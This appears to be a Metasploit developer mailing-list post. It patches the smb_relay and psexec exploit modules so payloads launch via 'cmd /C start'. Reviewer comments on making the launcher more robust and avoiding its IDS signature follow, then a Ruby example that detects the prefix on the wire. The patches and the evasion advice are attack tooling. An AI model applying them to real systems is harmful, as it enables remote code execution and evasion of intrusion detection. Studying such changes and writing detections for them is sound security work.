The problem with running payloads under smb_relay and psexec is that Windows expects them to be services, which they aren't. Windows expects services to respond to calls to start, stop, give a status, etc., and none of the payloads obviously do that. Therefore, when we start a service, Windows asks the application for a status; when it doesn't get it, it terminates the application.
But the application does run for a few seconds, so the solution is to simply invoke the application on its own rather than within a service. Once that's done, the application will be running in memory as a standalone and the fact that a service started it is not a problem. At first, I thought this would require building a special launcher application, but then I remembered Windows already has one. Simply change:

  NDR.wstring("%SYSTEMROOT%\\#(unknown)") + # Binary Path

to:

  NDR.wstring("cmd /C start %SYSTEMROOT%\\#(unknown)") + # Binary Path

This invokes a command shell which executes the start command. Windows immediately terminates the cmd shell and returns an error, but it has already run "start 'payload'", invoking the app in its own right.

The two main problems I see with this:

1) You now have somewhat of a trigger for IDS (creating services with bin_paths starting with "cmd /C start" can't be common)
2) It still doesn't clean up after itself.

But, if you find this useful anyway, here are the patches:

--- smb_relay.rb.old 2008-07-02 17:03:16.000000000 +0000 +++ smb_relay.rb 2008-07-02 17:07:32.000000000 +0000 @@ -180,7 +180,7 @@ NDR.long(0x00000003) + # Start: Demand NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring("%SYSTEMROOT%\\#(unknown)") + # Binary Path + NDR.wstring("cmd /C start %SYSTEMROOT%\\#(unknown)") + # Binary Path NDR.long(0) + # LoadOrderGroup NDR.long(0) + # Dependencies NDR.long(0) + # Service Start --- psexec.rb.old 2008-07-02 17:08:46.000000000 +0000 +++ psexec.rb 2008-07-02 17:09:14.000000000 +0000 @@ -164,7 +164,7 @@ NDR.long(0x00000003) + # Start: Demand NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring("%SYSTEMROOT%\\#(unknown)") + # Binary Path + NDR.wstring("cmd /C start %SYSTEMROOT%\\#(unknown)") + # Binary Path NDR.long(0) + # LoadOrderGroup NDR.long(0) + # Dependencies NDR.long(0) + # Service Start
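Review bot: in the smb_relay.rb hunk the new binary path hands `start` an unquoted `%SYSTEMROOT%\...` and relies on `cmd` being found through the service's PATH. `start` treats a leading quoted token as the window title and splits an unquoted path on spaces, so the robust form is `cmd /C start "" "%SYSTEMROOT%\..."`, and `%COMSPEC% /C start ...` removes the PATH dependency; both keep the behaviour the change intends. The `# Binary Path` comment should also say that the service is expected to fail its start (the covering mail says the SCM returns an error once cmd exits), so whoever reads the StartService result in this module treats that error as the expected outcome rather than as a failed exploit.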
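Review bot: the psexec.rb hunk introduces the same `"cmd /C start %SYSTEMROOT%\\..."` literal that the smb_relay.rb hunk adds, so the two modules now carry a duplicated launcher string that will drift the next time one of them is touched. Factor the prefix into a shared helper or a module option (a boolean that toggles the launcher prefix), which also lets a user keep the original direct binary path when the payload really is a service and avoid the `cmd /C start` signature the mail itself flags as an IDS trigger. The change still leaves the service and the dropped file behind after the start call, as the mail notes; a follow-up that deletes the service once StartService returns would belong with this change.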
_______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
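The point the mail makes about IDS, illustrated with an added example that is not code from the original post or from Metasploit: a minimal DCE/RPC NDR conformant-varying wide-string encoder (the layout in which the CreateServiceW binary path travels on the wire), a helper that builds the binary path with and without the `cmd /C start` launcher prefix, and a check that looks for that prefix as UTF-16LE in a raw request buffer the way a network signature would. `payload_name` stands in for the filename the original code interpolates, and whether `ndr_wstring` matches Rex's `NDR.wstring` byte for byte is an assumption, not something verified here.

```ruby
# Added example (not from the original post or from Metasploit): NDR
# wide-string encoding of the CreateServiceW binary path, plus a check for
# the "cmd /C start" launcher prefix as it appears on the wire.  Whether
# this matches Rex's NDR.wstring byte for byte is an assumption.

# Encode +str+ as MaxCount, Offset, ActualCount (uint32 LE, counted in
# UTF-16 code units incl. the terminating NUL; assumes BMP characters),
# followed by the NUL-terminated UTF-16LE text, padded to a 4-byte boundary.
def ndr_wstring(str)
  utf16 = (str + "\0").encode('UTF-16LE').b
  chars = str.length + 1
  out = [chars, 0, chars].pack('V3') + utf16
  out + ("\0" * ((4 - out.bytesize % 4) % 4)).b
end

# Build the service binary path the way the patch does.  +payload_name+ is
# a hypothetical stand-in for the filename the original code interpolates.
def service_binpath(payload_name, launcher: true)
  path = "%SYSTEMROOT%\\#{payload_name}"
  launcher ? "cmd /C start #{path}" : path
end

# The prefix as it sits inside the NDR string: UTF-16LE, so a plain ASCII
# "cmd /C start" pattern would not match the request bytes.
CMD_START_UTF16 = 'cmd /C start '.encode('UTF-16LE').b

# Signature-style check over a raw DCERPC request buffer.
def cmd_start_launcher?(buf)
  buf.b.include?(CMD_START_UTF16)
end

if __FILE__ == $0
  plain    = ndr_wstring(service_binpath('payload.exe', launcher: false))
  launcher = ndr_wstring(service_binpath('payload.exe'))
  puts "plain:    #{plain.bytesize} bytes, flagged=#{cmd_start_launcher?(plain)}"
  puts "launcher: #{launcher.bytesize} bytes, flagged=#{cmd_start_launcher?(launcher)}"
end
```

The check deliberately matches the UTF-16LE form: the same string written as ASCII is not what crosses the wire, so a signature written against the ASCII literal would miss the request entirely. `payload.exe` in the usage lines is a constructed name, not one the original code uses.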